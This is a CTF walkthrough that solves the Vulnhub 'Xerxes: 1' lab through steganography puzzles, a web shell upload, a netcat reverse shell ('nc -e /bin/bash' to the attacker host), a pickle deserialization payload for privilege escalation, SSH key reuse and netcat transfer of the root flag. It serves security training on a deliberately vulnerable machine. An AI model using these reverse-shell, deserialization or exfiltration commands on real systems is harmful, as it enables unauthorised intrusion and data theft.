Xerxes: 1 Vulnhub Walkthrough
Welcome to another boot2root CTF challenge “Xerxes: 1” uploaded by bas on vulnhub. As, there is a theme, and you will need to snag the flag in order to complete the challenge and you can download it from the given below link:
https://download.vulnhub.com/xerxes/xerxes.tar.gz
By author, it has a good variety of techniques needed to get root – no exploit development/buffer overflows. So, on the basis of our experience and knowledge, we have made progress in solving the lab.
Level: Beginner
Penetrating Methodologies:
- Network scanning (Nmap)
- Surfing HTTP web services
- Directory bruteforcing (Dirb)
- Base64 decoding
- Gimp Editor to zoom image and find the hint
- Decimal to ASCII, Brainfuck decrypting
- Search and Capture the flag at various stages
Walkthrough
The first step is as always, running netdiscover on the VM to grab the IP address. In my case, the IP was 192.168.1.102.
Now, let us run a scan on the discovered IP address to see the available ports
nmap -A 192.168.1.102
From the nmap scan result, we found port 80 is open for HTTP service, let’s navigate to port 80 in the browser.
When we didn’t find any remarkable clue from its home page, then without wasting much time, I use dirb for web directory enumeration and executed the following command:
dirb http://192.168.1.102
From the above scan we found that there is another directory /dev, so let’s browse it.
http://192.168.1.102/dev
Here we found the link provided for forgot password, so we will browse it to see if there is something useful.
To our surprise, there is a QR code, so let’s scan it to see what is hidden inside. On scanning QR code we found a base64 encoded text.
Now let’s decode the base64 string to find if there is any hint or useful information available.
The clue said look deeper, so we tried to zoom the image and found that there are some different pixels on the top left of the image. To read that we used the color-picker tool in the GIMP editor. To do this, we used Gimp Editor tool and used the option Open in Layers in the File menu, after that we deselected all the layers except the alpha layer of the image, then used the Color-Picker tool from the Tools menu to find the alpha values of the pixels
After collecting all the alpha values, we’ll find the ASCII characters of the decimal values we found.
Now, we came to know that the ASCII chars are actually the base64 encoded value, so let’s decrypt and see what we get.
After decoding the base64 we found that it is another encryption named BrainFuck, let’s try to decrypt the BrainFuck encrypted string.
Now let us try to use this value as a password to upload our file, after trying to upload PHP shell, we tried to upload shell in “pht” extension.
Now access the shell from URL and run ls command to check if the shell has created the RCE vulnerability.
Since it was vulnerable to RCE, therefore we can exploit the victim’s machine by executing the following command.
http://192.168.1.102/dev/upload/shell.pht?cmd=nc -e /bin/bash 192.168.1.109 1234
On the other hand, keep the netcat listener active on the kali terminal,
nc -lvp 1234
As soon as we get our reverse connection, the first thing we do is to upgrade our session into a more interactive one, so we will use python one-liner to upgrade our session from sh to bash
python -c 'import pty;pty.spawn("/bin/bash")'
Now let’s go home and find the number of users
cd /home ls
Here we found that there are 3 users named amanpour, curtiz, and Delacroix, we will first head in amanpour and check the contents
cd amanpour ls -la
Here we found .bash_history file, now we will check the contents of the file
cat .bash_history
In this file, you will find the python command for a new password, run the command and you will find the password
python steqr.py -f newpassword
Now we got the password of amanpour so let’s try to connect to amanpour using these credentials
ssh amanpour@192.168.1.102
Here we will search for files with suid permissions
find / -perm -4000 -type f 2>/dev/null
here we found the file /opt/notes, so let’s go in /opt file to find the files inside it, here along with notes we will also find notes.py, so we will see the contents of notes.py file.
cd /opt ls cat notes.py
Here we will find out that whatever the file needs to be loaded in the notes executable should either be in /home/curtiz or the file path should start with ../../ as to first go to directory backwards and then provide the full path from / directory
In notes.py, we find that the script is using the pickle module. Now the pickle module is vulnerable to insecure de-serialization. So we can execute any code of our choice. As we can load the file in the script we created a file that executes “/bin/sh”
cat > /tmp/shell cos system (S'/bin/sh' tR.
Now execute the notes executable file and load the shell file directly from tmp directory
./notes load ../../tmp/shell
As soon we run load /tmp/shell we spawn a shell and when we checked the id, we found that the amanpour is also a member of curtiz group, so we will now go to curtiz home directory
cd /home/curtiz
When we check the content of the directory, we find a file called notes. We take look at the content of notes and find a hint to log in through user Marie.
ls cat notes
We check passwd file to find if user “Marie” exists. After opening the file, we find that the “Marie” is the first name for user “delacroix”. We also find that it uses a custom shell called “/bin/delacroix”.
cat /etc/passwd | grep "Marie"
Now let’s see the contents of “/bin/delacroix” using strings function, here you’ll find an md5 hash
strings /bin/delacroix
Now let’s decrypt the md5 value online, it will give us the result as “VonBraun”.
Now let’s try to connect as Delacroix via SSH with this password, but we are unable to successfully log in.
ssh delacroix@192.168.1.102
In /home/curtiz directory, there was a file called id_rsa. We check the content of the file and find it is RSA private key.
cat id_rsa
We copy the RSA key from the target machine to our machine. Now when we log in through SSH using the private key.
ssh -i id_rsa delacroix@192.168.1.102
After logging in, we will check the contents of the “/home/delacroix” directory only to discover two files check.sh and generate.sh. “check.sh” script provides the customized login message. The script “generate.sh” creates a new “.last” file and uses the timestamp of the file to generate a unique md5.
So now we will need to find the md5 hash value of the creation time of “.last” file, for that first we will use stat command to check the time when the file was created
stat .last
After getting the timestamp of “.last” file, it’s time to get the md5 hash value, for this we’ll use md5sum function along with echo command to get the md5 hash. We are going to use the time at which Marie created the file
echo 00:19:51 |md5sum
Now we have the password too, so let’s capture the flag, open the root terminal using sudo bash command along with the password we found and BOOM. You’re logged in as root now.
Look around to find the flag now, use the cd command to go to the root directory and use ls to check the contents of the directory. You will find file flag here.
cd /root ls
When we see the type of flag file, it displayed that it is a png image data
file flag
Let’s use netcat to transfer this file to our kali machine
nc 192.168.1.109 5555 < flag
In the meanwhile, you should also start netcat listener in the kali machine with directing the incoming file to a new file
nc -lvp 5555 > flag
Now finally we open the flag file and it’s done.
Author: Deepanshu is a Certified Ethical Hacker and a budding Security researcher. Contact here.